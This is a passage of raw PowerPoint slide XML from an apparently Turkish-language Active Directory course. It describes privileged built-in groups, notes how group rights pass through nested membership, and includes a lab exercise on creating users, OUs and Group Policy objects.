            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>geçirilebilmektedir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>Gruplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Administrators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>yetkiye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>gruptur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Domain Admins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>: Domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>yetkiye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>gruptur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> . </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Enterprise Admins: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Birden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>fazla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>bulunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>ortamda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>domainlerde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>yetkiye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>sahip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>gruptur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> 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4BCAD54-4B20-4DE6-BACF-73FE211319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85677"/>
            <a:ext cx="5181600" cy="30312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12006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166EB-48D8-0B44-2D86-1360C5CAE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Yetkili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Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Objeler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5F3F7-F709-FFD9-E3E1-29B9F7285D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err="1"/>
              <a:t>Yetkili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Gruplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" err="1"/>
              <a:t>DnsAdmins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> DLL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>çalıştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sahiptirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Group Policy Creator Owners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>oluşturma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sahiptirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Print Operators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>Sunucularda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yazıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yazıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sürücüsü</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> (driver) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>ekleyerek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>çalıştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sahiptirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Server Operators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>Sunucuların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yönetimini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>gerçekleştirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sahiptirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Account Operators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>: Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>hesaplarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yönetimini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>gerçekleştirme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>yetkisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>sahiptirler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>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32ADC0-754D-A2A3-6ADD-499E0FF5D8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74295"/>
            <a:ext cx="5181600" cy="245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4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3CC6E-9EE4-A4B1-565A-98AFC5AC9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Önemli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Not – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gruplarda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Yetki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aktarımı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77543-FB82-BB0B-CA81-CE764518FE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r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Gruplar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>bünyesindeki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>yetkileri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (ACL, Local Admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>vb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>barındırdıkları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>üye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>objelere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>aktarırlar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Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>iç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>içe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (nested) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>üyelikleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>detaylı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>incelenmelidir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4502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57720-5ED1-994F-32EB-D4FA63E32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Uygulama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #1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C7090-FBBD-5628-E923-161C83A941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r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Domain Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sunucusu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üzerinde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oturum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory Users and Computers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>uygulamasını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>açınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ortamındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objeleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>obje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>özelliklerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>grup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>üyeliklerini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>inceleyiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hesabı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Oluşturduğunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcıyı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Domain Admins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>grubuna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ekleyiniz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Organizational Unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Oluşturduğunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>kullanıcıyı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> OU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>içerisine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>taşıyınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>adet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Group Policy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>objesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>oluşturunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Oluşturduğunuz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GPO’yu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>OU’ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>bağlayınız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.(link)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2239989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7D011-D405-CE36-A44B-F7302A819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ACE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ve</a:t>
            </a:r>
